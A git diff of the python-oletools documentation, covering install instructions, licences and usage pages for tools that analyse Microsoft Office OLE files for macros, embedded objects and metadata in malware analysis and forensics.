diff --git a/README.md b/README.md index 4e900ff..e0c5205 100644 --- a/README.md +++ b/README.md @@ -22,7 +22,9 @@ Note: python-oletools is not related to OLETools published by BeCubed Software. News ---- -- **2015-02-08 v0.08**: [olevba](https://bitbucket.org/decalage/oletools/wiki/olevba) can now decode strings +- **2015-03-23 v0.09**: [olevba](https://bitbucket.org/decalage/oletools/wiki/olevba) now supports Word 2003 XML files, +added anti-sandboxing/VM detection +- 2015-02-08 v0.08: [olevba](https://bitbucket.org/decalage/oletools/wiki/olevba) can now decode strings obfuscated with Hex/StrReverse/Base64/Dridex and extract IOCs. Added new triage mode, support for non-western codepages with olefile 0.42, improved API and display, several bugfixes. - 2015-01-05 v0.07: improved [olevba](https://bitbucket.org/decalage/oletools/wiki/olevba) to detect suspicious diff --git a/oletools/README.html b/oletools/README.html index 7390859..7f47cc0 100644 --- a/oletools/README.html +++ b/oletools/README.html @@ -1,65 +1,55 @@ - - -
- - - -python-oletools is a package of python tools to analyze Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft Office documents or Outlook messages, mainly for malware analysis, forensics and debugging. It is based on the olefile parser. See http://www.decalage.info/python/oletools for more info.
-Quick links: Home page - Download/Install - Documentation - Report Issues/Suggestions/Questions - Contact the Author - Repository - Updates on Twitter
-Note: python-oletools is not related to OLETools published by BeCubed Software.
-To use python-oletools from the command line as analysis tools, you may simply download the zip archive and extract the files in the directory of your choice.
-To get the latest development version, click on "Download repository" on the downloads page, or use mercurial to clone the repository.
-If you plan to use python-oletools with other Python applications or your own scripts, then the simplest solution is to use "pip install oletools" or "easy_install oletools" to download and install in one go. Otherwise you may download/extract the zip archive and run "setup.py install".
-The latest version of the documentation can be found online, otherwise a copy is provided in the doc subfolder of the package.
-This is a personal open-source project, developed on my spare time. Any contribution, suggestion, feedback or bug report is welcome.
-To suggest improvements, report a bug or any issue, please use the issue reporting page, providing all the information and files to reproduce the problem.
-You may also contact the author directly to provide feedback.
-The code is available in a Mercurial repository on Bitbucket. You may use it to submit enhancements using forks and pull requests.
-This license applies to the python-oletools package, apart from the thirdparty folder which contains third-party files published with their own license.
-The python-oletools package is copyright (c) 2012-2015 Philippe Lagadec (http://www.decalage.info)
-All rights reserved.
-Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-olevba contains modified source code from the officeparser project, published under the following MIT License (MIT):
-officeparser is copyright (c) 2014 John William Davison
-Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
-The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
- - +python-oletools is a package of python tools to analyze Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft Office documents or Outlook messages, mainly for malware analysis, forensics and debugging. It is based on the olefile parser. See http://www.decalage.info/python/oletools for more info.
+Quick links: Home page - Download/Install - Documentation - Report Issues/Suggestions/Questions - Contact the Author - Repository - Updates on Twitter
+Note: python-oletools is not related to OLETools published by BeCubed Software.
+To use python-oletools from the command line as analysis tools, you may simply download the zip archive and extract the files in the directory of your choice.
+To get the latest development version, click on "Download repository" on the downloads page, or use mercurial to clone the repository.
+If you plan to use python-oletools with other Python applications or your own scripts, then the simplest solution is to use "pip install oletools" or "easy_install oletools" to download and install in one go. Otherwise you may download/extract the zip archive and run "setup.py install".
+The latest version of the documentation can be found online, otherwise a copy is provided in the doc subfolder of the package.
+This is a personal open-source project, developed on my spare time. Any contribution, suggestion, feedback or bug report is welcome.
+To suggest improvements, report a bug or any issue, please use the issue reporting page, providing all the information and files to reproduce the problem.
+You may also contact the author directly to provide feedback.
+The code is available in a Mercurial repository on Bitbucket. You may use it to submit enhancements using forks and pull requests.
+This license applies to the python-oletools package, apart from the thirdparty folder which contains third-party files published with their own license.
+The python-oletools package is copyright (c) 2012-2015 Philippe Lagadec (http://www.decalage.info)
+All rights reserved.
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+olevba contains modified source code from the officeparser project, published under the following MIT License (MIT):
+officeparser is copyright (c) 2014 John William Davison
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
diff --git a/oletools/README.rst b/oletools/README.rst index 01f5e7d..a5614fd 100644 --- a/oletools/README.rst +++ b/oletools/README.rst @@ -1,188 +1,191 @@ -python-oletools -=============== - -`python-oletoolsThis is a personal open-source project, developed on my spare time. Any contribution, suggestion, feedback or bug report is welcome.
-To suggest improvements, report a bug or any issue, please use the issue reporting page, providing all the information and files to reproduce the problem.
-You may also contact the author directly to provide feedback.
-The code is available in a Mercurial repository on Bitbucket. You may use it to submit enhancements using forks and pull requests.
-How to Suggest Improvements, Report Issues or Contribute
+========================================================
+This is a personal open-source project, developed on my spare time. Any contribution, suggestion, feedback or bug report is welcome.
+To suggest improvements, report a bug or any issue, please use the issue reporting page,
+providing all the information and files to reproduce the problem.
+You may also contact the author directly to provide feedback.
+The code is available in a Mercurial repository on Bitbucket.
+You may use it to submit enhancements using forks and pull requests.
+python-oletools documentation
+Contribute, Suggest Improvements or Report Issues
Tools:
+This is the home page of the documentation for python-oletools. The latest version can be found online, otherwise a copy is provided in the doc subfolder of the package.
-python-oletools is a package of python tools to analyze Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft Office documents or Outlook messages, mainly for malware analysis, forensics and debugging. It is based on the olefile parser. See http://www.decalage.info/python/oletools for more info.
-Quick links: Home page - Download/Install - Documentation - Report Issues/Suggestions/Questions - Contact the author - Repository - Updates on Twitter
-Note: python-oletools is not related to OLETools published by BeCubed Software.
-python-oletools v0.09 documentation
+===================================
+This is the home page of the documentation for python-oletools. The latest version can be found
+online, otherwise a copy is provided in the doc subfolder of the package.
+python-oletools is a package of python tools to analyze
+ +(also called Structured Storage, Compound File Binary Format or Compound Document File Format),
+such as Microsoft Office documents or Outlook messages, mainly for malware analysis, forensics and debugging.
+It is based on the olefile parser.
+See http://www.decalage.info/python/oletools for more info.
+Quick links: Home page -
+ + +Report Issues/Suggestions/Questions -
+ + + +Note: python-oletools is not related to OLETools published by BeCubed Software.
+Tools in python-oletools:
+view and extract individual data streams.
+oleid: a tool to analyze OLE files to detect specific characteristics usually found in malicious files.
olemeta: a tool to extract all standard properties (metadata) from OLE files.
oletimes: a tool to extract creation and modification timestamps of all streams and storages.
olevba: a tool to extract and analyze VBA Macro source code from MS Office documents (OLE and OpenXML).
pyxswf: a tool to detect, extract and analyze Flash objects (SWF) that may
be embedded in files such as MS Office documents (e.g. Word, Excel) and RTF,
+which is especially useful for malware analysis.
+rtfobj: a tool and python module to extract embedded objects from RTF files.
and a few others (coming soon)
python-oletools documentation
+Contribute, Suggest Improvements or Report Issues
Tools:
+For now, python-oletools require Python 2.x, if possible 2.6 or 2.7. They are not compatible with Python 3.x yet.
-To use python-oletools from the command line as analysis tools, you may simply download the zip archive and extract the files in the directory of your choice. Pick the latest release version, or click on "Download Repository" to get the latest development version with the most recent features.
-Another possibility is to use a Mercurial client (hg) to clone the repository in a folder. You can then update it easily in the future.
-You may add the oletools directory to your PATH environment variable to access the tools from anywhere.
-If you plan to use python-oletools with other Python applications or your own scripts, the simplest solution is to use "pip install oletools" or "easy_install oletools" to download and install the package in one go. Pip is included with Python since version 2.7.9.
-Important: to update oletools if it is already installed, you must run "pip install -U oletools", otherwise pip will not update it.
-Alternatively, you may download/extract the zip archive in a temporary directory and run "python setup.py install".
-How to Download and Install python-oletools
+===========================================
+Pre-requisites
+For now, python-oletools require Python 2.x, if possible 2.7 or 2.6 to enable all features.
+They are not compatible with Python 3.x yet. (Please contact me if that is a strong requirement)
+To use oletools as command-line tools
+To use python-oletools from the command line as analysis tools, you may simply
+ +and extract the files into the directory of your choice. Pick the latest release version, or click on
+"Download Repository" to get the latest development version with the most recent features.
+Another possibility is to use a Mercurial client (hg) to clone the repository into a folder. You can then update it easily
+in the future.
+You may add the oletools directory to your PATH environment variable to access the tools from anywhere.
+It is very convenient to create symbolic links to each tool in one of the bin directories in order to run them as shell
+commands from anywhere. For example, here is how to create an executable link "olevba" in /usr/local/bin pointing to
+olevba.py, assuming oletools was unzipped into /opt/oletools:
+chmod +x /opt/oletools/oletools/olevba.py
+
+ln -s /opt/oletools/oletools/olevba.py /usr/local/bin/olevba
+Then the olevba command can be used from any directory:
+user@remnux:~/MalwareZoo/VBA$ olevba dridex427.xls |less
+For python applications
+If you plan to use python-oletools with other Python applications or your own scripts, the simplest solution is to use
+"pip install oletools" or "easy_install oletools" to download and install the package in one go. Pip is included
+with Python since version 2.7.9.
+Important: to update oletools if it is already installed, you must run "pip install -U oletools", otherwise pip
+will not update it.
+Alternatively if you prefer the old school way, you may download the
+zip archive, extract it into
+a temporary directory and run "python setup.py install".
+python-oletools documentation
+Contribute, Suggest Improvements or Report Issues
Tools:
+This license applies to the python-oletools package, apart from the thirdparty folder which contains third-party files published with their own license.
-The python-oletools package is copyright (c) 2012-2015 Philippe Lagadec (http://www.decalage.info)
-All rights reserved.
-Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-| License for officeparser | -
olevba contains modified source code from the officeparser project, published under the following MIT License (MIT):
-officeparser is copyright (c) 2014 John William Davison
-Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
-The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
-License for python-oletools
+===========================
+This license applies to the python-oletools package, apart from the
+thirdparty folder which contains third-party files published with their own license.
+The python-oletools package is copyright (c) 2012-2015 Philippe Lagadec (http://www.decalage.info)
+All rights reserved.
+Redistribution and use in source and binary forms, with or without modification,
+are permitted provided that the following conditions are met:
+list of conditions and the following disclaimer.
+this list of conditions and the following disclaimer in the documentation
+and/or other materials provided with the distribution.
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
+ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+License for officeparser
+olevba contains modified source code from the officeparser project, published
+under the following MIT License (MIT):
+officeparser is copyright (c) 2014 John William Davison
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.
+python-oletools documentation
+Contribute, Suggest Improvements or Report Issues
Tools:
+olebrowse is a simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to view and extract individual data streams.
-It is part of the python-oletools package.
-olebrowse.py [file]
-If you provide a file it will be opened, else a dialog will allow you to browse folders to open a file. Then if it is a valid OLE file, the list of data streams will be displayed. You can select a stream, and then either view its content in a builtin hexadecimal viewer, or save it to a file for further analysis.
-Main menu, showing all streams in the OLE file:
-
-Menu with actions for a stream:
-
-Hex view for a stream:
-
-olebrowse
+=========
+olebrowse is a simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to
+view and extract individual data streams.
+It is part of the python-oletools package.
+Usage
+olebrowse.py [file]
+If you provide a file it will be opened, else a dialog will allow you to browse folders to open a file. Then if it is a valid OLE file, the list of data streams will be displayed. You can select a stream, and then either view its content in a builtin hexadecimal viewer, or save it to a file for further analysis.
+Screenshots
+Main menu, showing all streams in the OLE file:
+
+Menu with actions for a stream:
+
+Hex view for a stream:
+
+python-oletools documentation
+Contribute, Suggest Improvements or Report Issues
Tools:
+oleid is a script to analyze OLE files such as MS Office documents (e.g. Word, Excel), to detect specific characteristics usually found in malicious files (e.g. malware). For example it can detect VBA macros and embedded Flash objects.
-It is part of the python-oletools package.
-Planned improvements:
-oleid.py <file>
-Analyzing a Word document containing a Flash object and VBA macros:
-C:\oletools>oleid.py word_flash_vba.doc
-
-Filename: word_flash_vba.doc
-+-------------------------------+-----------------------+
-| Indicator | Value |
-+-------------------------------+-----------------------+
-| OLE format | True |
-| Has SummaryInformation stream | True |
-| Application name | Microsoft Office Word |
-| Encrypted | False |
-| Word Document | True |
-| VBA Macros | True |
-| Excel Workbook | False |
-| PowerPoint Presentation | False |
-| Visio Drawing | False |
-| ObjectPool | True |
-| Flash objects | 1 |
-+-------------------------------+-----------------------+
-First, import oletools.oleid, and create an OleID object to scan a file:
-import oletools.oleid
-
-oid = oletools.oleid.OleID(filename)
-Note: filename can be a filename, a file-like object, or a bytes string containing the file to be analyzed.
-Second, call the check() method. It returns a list of Indicator objects.
-Each Indicator object has the following attributes:
-For example, the following code displays all the indicators:
-indicators = oid.check()
-for i in indicators:
- print 'Indicator id=%s name="%s" type=%s value=%s' % (i.id, i.name, i.type, repr(i.value))
- print 'description:', i.description
- print ''
-See the source code of oleid.py for more details.
-oleid
+=====
+oleid is a script to analyze OLE files such as MS Office documents (e.g. Word,
+Excel), to detect specific characteristics usually found in malicious files (e.g. malware).
+For example it can detect VBA macros and embedded Flash objects.
+It is part of the python-oletools package.
+Detect OLE file type from its internal structure (e.g. MS Word, Excel, PowerPoint, ...)
Detect VBA Macros
Detect embedded Flash objects
Detect embedded OLE objects
Detect MS Office encryption
Can be used as a command-line tool
Python API to integrate it in your applications
Planned improvements:
+Extract the most important metadata fields
Support for OpenXML files and embedded OLE files
Generic VBA macros detection
Detect auto-executable VBA macros
Extended OLE file types detection
Detect unusual OLE structures (fragmentation, unused sectors, etc)
Options to scan multiple files
Options to scan files from encrypted zip archives
CSV output
oleid.py <file>
+Analyzing a Word document containing a Flash object and VBA macros:
+C:\oletools>oleid.py word_flash_vba.doc
+
+
+
+Filename: word_flash_vba.doc
+
++-------------------------------+-----------------------+
+
+| Indicator | Value |
+
++-------------------------------+-----------------------+
+
+| OLE format | True |
+
+| Has SummaryInformation stream | True |
+
+| Application name | Microsoft Office Word |
+
+| Encrypted | False |
+
+| Word Document | True |
+
+| VBA Macros | True |
+
+| Excel Workbook | False |
+
+| PowerPoint Presentation | False |
+
+| Visio Drawing | False |
+
+| ObjectPool | True |
+
+| Flash objects | 1 |
+
++-------------------------------+-----------------------+
+First, import oletools.oleid, and create an OleID object to scan a file:
+import oletools.oleid
+
+
+
+oid = oletools.oleid.OleID(filename)
+Note: filename can be a filename, a file-like object, or a bytes string containing the file to be analyzed.
+Second, call the check() method. It returns a list of Indicator objects.
+Each Indicator object has the following attributes:
+id: str, identifier for the indicator
name: str, name to display the indicator
description: str, long description of the indicator
type: class of the indicator (e.g. bool, str, int)
value: value of the indicator
For example, the following code displays all the indicators:
+indicators = oid.check()
+
+for i in indicators:
+
+ print 'Indicator id=%s name="%s" type=%s value=%s' % (i.id, i.name, i.type, repr(i.value))
+
+ print 'description:', i.description
+
+ print ''
+See the source code of oleid.py for more details.
+python-oletools documentation
+Contribute, Suggest Improvements or Report Issues
Tools:
+olemeta is a script to parse OLE files such as MS Office documents (e.g. Word, Excel), to extract all standard properties present in the OLE file.
-It is part of the python-oletools package.
-olemeta.py <file>
-Checking the malware sample DIAN_caso-5415.doc:
->olemeta.py DIAN_caso-5415.doc
-
-Properties from SummaryInformation stream:
-- codepage: 1252
-- title: 'Gu\xeda MIPYME para ser emisor electr\xf3nico'
-- subject: ''
-- author: 'OFEyDV'
-- keywords: ''
-- comments: ''
-- template: 'Normal.dotm'
-- last_saved_by: 'clein'
-- revision_number: '13'
-- total_edit_time: 4800L
-- last_printed: datetime.datetime(2006, 6, 7, 14, 4)
-- create_time: datetime.datetime(2009, 3, 30, 14, 18)
-- last_saved_time: datetime.datetime(2014, 5, 14, 12, 45)
-- num_pages: 7
-- num_words: 269
-- num_chars: 1485
-- thumbnail: None
-- creating_application: 'Microsoft Office Word'
-- security: 0
-
-Properties from DocumentSummaryInformation stream:
-- codepage_doc: 1252
-- category: None
-- presentation_target: None
-- bytes: None
-- lines: 12
-- paragraphs: 3
-- slides: None
-- notes: None
-- hidden_slides: None
-- mm_clips: None
-- scale_crop: False
-- heading_pairs: None
-- titles_of_parts: None
-- manager: None
-- company: 'Servicio de Impuestos Internos'
-- links_dirty: False
-- chars_with_spaces: 1751
-- unused: None
-- shared_doc: False
-- link_base: None
-- hlinks: None
-- hlinks_changed: False
-- version: 786432
-- dig_sig: None
-- content_type: None
-- content_status: None
-- language: None
-- doc_version: None
-TODO
-olemeta
+=======
+olemeta is a script to parse OLE files such as MS Office documents (e.g. Word,
+Excel), to extract all standard properties present in the OLE file.
+It is part of the python-oletools package.
+olemeta.py <file>
+Checking the malware sample DIAN_caso-5415.doc:
+>olemeta.py DIAN_caso-5415.doc
+
+
+
+Properties from SummaryInformation stream:
+
+- codepage: 1252
+
+- title: 'Gu\xeda MIPYME para ser emisor electr\xf3nico'
+
+- subject: ''
+
+- author: 'OFEyDV'
+
+- keywords: ''
+
+- comments: ''
+
+- template: 'Normal.dotm'
+
+- last_saved_by: 'clein'
+
+- revision_number: '13'
+
+- total_edit_time: 4800L
+
+- last_printed: datetime.datetime(2006, 6, 7, 14, 4)
+
+- create_time: datetime.datetime(2009, 3, 30, 14, 18)
+
+- last_saved_time: datetime.datetime(2014, 5, 14, 12, 45)
+
+- num_pages: 7
+
+- num_words: 269
+
+- num_chars: 1485
+
+- thumbnail: None
+
+- creating_application: 'Microsoft Office Word'
+
+- security: 0
+
+
+
+Properties from DocumentSummaryInformation stream:
+
+- codepage_doc: 1252
+
+- category: None
+
+- presentation_target: None
+
+- bytes: None
+
+- lines: 12
+
+- paragraphs: 3
+
+- slides: None
+
+- notes: None
+
+- hidden_slides: None
+
+- mm_clips: None
+
+- scale_crop: False
+
+- heading_pairs: None
+
+- titles_of_parts: None
+
+- manager: None
+
+- company: 'Servicio de Impuestos Internos'
+
+- links_dirty: False
+
+- chars_with_spaces: 1751
+
+- unused: None
+
+- shared_doc: False
+
+- link_base: None
+
+- hlinks: None
+
+- hlinks_changed: False
+
+- version: 786432
+
+- dig_sig: None
+
+- content_type: None
+
+- content_status: None
+
+- language: None
+
+- doc_version: None
+TODO
+python-oletools documentation
+Contribute, Suggest Improvements or Report Issues
Tools:
+oletimes is a script to parse OLE files such as MS Office documents (e.g. Word, Excel), to extract creation and modification times of all streams and storages in the OLE file.
-It is part of the python-oletools package.
-oletimes.py <file>
-Checking the malware sample DIAN_caso-5415.doc:
->oletimes.py DIAN_caso-5415.doc
-
-+----------------------------+---------------------+---------------------+
-| Stream/Storage name | Modification Time | Creation Time |
-+----------------------------+---------------------+---------------------+
-| Root | 2014-05-14 12:45:24 | None |
-| '\x01CompObj' | None | None |
-| '\x05DocumentSummaryInform | None | None |
-| ation' | | |
-| '\x05SummaryInformation' | None | None |
-| '1Table' | None | None |
-| 'Data' | None | None |
-| 'Macros' | 2014-05-14 12:45:24 | 2014-05-14 12:45:24 |
-| 'Macros/PROJECT' | None | None |
-| 'Macros/PROJECTwm' | None | None |
-| 'Macros/VBA' | 2014-05-14 12:45:24 | 2014-05-14 12:45:24 |
-| 'Macros/VBA/ThisDocument' | None | None |
-| 'Macros/VBA/_VBA_PROJECT' | None | None |
-| 'Macros/VBA/__SRP_0' | None | None |
-| 'Macros/VBA/__SRP_1' | None | None |
-| 'Macros/VBA/__SRP_2' | None | None |
-| 'Macros/VBA/__SRP_3' | None | None |
-| 'Macros/VBA/dir' | None | None |
-| 'WordDocument' | None | None |
-+----------------------------+---------------------+---------------------+
-TODO
-oletimes
+========
+oletimes is a script to parse OLE files such as MS Office documents (e.g. Word,
+Excel), to extract creation and modification times of all streams and storages
+in the OLE file.
+It is part of the python-oletools package.
+oletimes.py <file>
+Checking the malware sample DIAN_caso-5415.doc:
+>oletimes.py DIAN_caso-5415.doc
+
+
+
++----------------------------+---------------------+---------------------+
+
+| Stream/Storage name | Modification Time | Creation Time |
+
++----------------------------+---------------------+---------------------+
+
+| Root | 2014-05-14 12:45:24 | None |
+
+| '\x01CompObj' | None | None |
+
+| '\x05DocumentSummaryInform | None | None |
+
+| ation' | | |
+
+| '\x05SummaryInformation' | None | None |
+
+| '1Table' | None | None |
+
+| 'Data' | None | None |
+
+| 'Macros' | 2014-05-14 12:45:24 | 2014-05-14 12:45:24 |
+
+| 'Macros/PROJECT' | None | None |
+
+| 'Macros/PROJECTwm' | None | None |
+
+| 'Macros/VBA' | 2014-05-14 12:45:24 | 2014-05-14 12:45:24 |
+
+| 'Macros/VBA/ThisDocument' | None | None |
+
+| 'Macros/VBA/_VBA_PROJECT' | None | None |
+
+| 'Macros/VBA/__SRP_0' | None | None |
+
+| 'Macros/VBA/__SRP_1' | None | None |
+
+| 'Macros/VBA/__SRP_2' | None | None |
+
+| 'Macros/VBA/__SRP_3' | None | None |
+
+| 'Macros/VBA/dir' | None | None |
+
+| 'WordDocument' | None | None |
+
++----------------------------+---------------------+---------------------+
+TODO
+python-oletools documentation
+Contribute, Suggest Improvements or Report Issues
Tools:
+olevba is a script to parse OLE and OpenXML files such as MS Office documents (e.g. Word, Excel), to detect VBA Macros, extract their source code in clear text, and detect security-related patterns such as auto-executable macros, suspicious VBA keywords used by malware, and potential IOCs (IP addresses, URLs, executable filenames, etc). It also detects and decodes several common obfuscation methods including Hex encoding, StrReverse, Base64, Dridex, and extracts IOCs from decoded strings.
-It can be used either as a command-line tool, or as a python module from your own applications.
-It is part of the python-oletools package.
-olevba is based on source code from officeparser by John William Davison, with significant modifications.
-MS Office files encrypted with a password are also supported, because VBA macro code is never encrypted, only the content of the document.
-See this article for more information and technical details about VBA Macros and how they are stored in MS Office documents.
-Usage: olevba.py [options] <filename> [filename2 ...]
-
-Options:
- -h, --help show this help message and exit
- -r find files recursively in subdirectories.
- -z ZIP_PASSWORD, --zip=ZIP_PASSWORD
- if the file is a zip archive, open first file from it,
- using the provided password (requires Python 2.6+)
- -f ZIP_FNAME, --zipfname=ZIP_FNAME
- if the file is a zip archive, file(s) to be opened
- within the zip. Wildcards * and ? are supported.
- (default:*)
- -t triage mode, display results as a summary table
- (default for multiple files)
- -d detailed mode, display full results (default for
- single file)
- -i INPUT, --input=INPUT
- input file containing VBA source code to be analyzed
- (no parsing)
- --decode display all the obfuscated strings with their decoded
- content (Hex, Base64, StrReverse, Dridex).
-Scan a single file:
-olevba.py file.doc
-Scan a single file, stored in a Zip archive with password "infected":
-olevba.py malicious_file.xls.zip -z infected
-Scan a single file, showing all obfuscated strings decoded:
-olevba.py file.doc --decode
-Scan VBA source code extracted into a text file:
-olevba.py -i source_code.vba
-Scan a collection of files stored in a folder:
-olevba.py MalwareZoo/VBA/*
-Scan all .doc and .xls files, recursively in all subfolders:
-olevba.py MalwareZoo/VBA/*.doc MalwareZoo/VBA/*.xls -r
-Scan all .doc files within all .zip files with password, recursively:
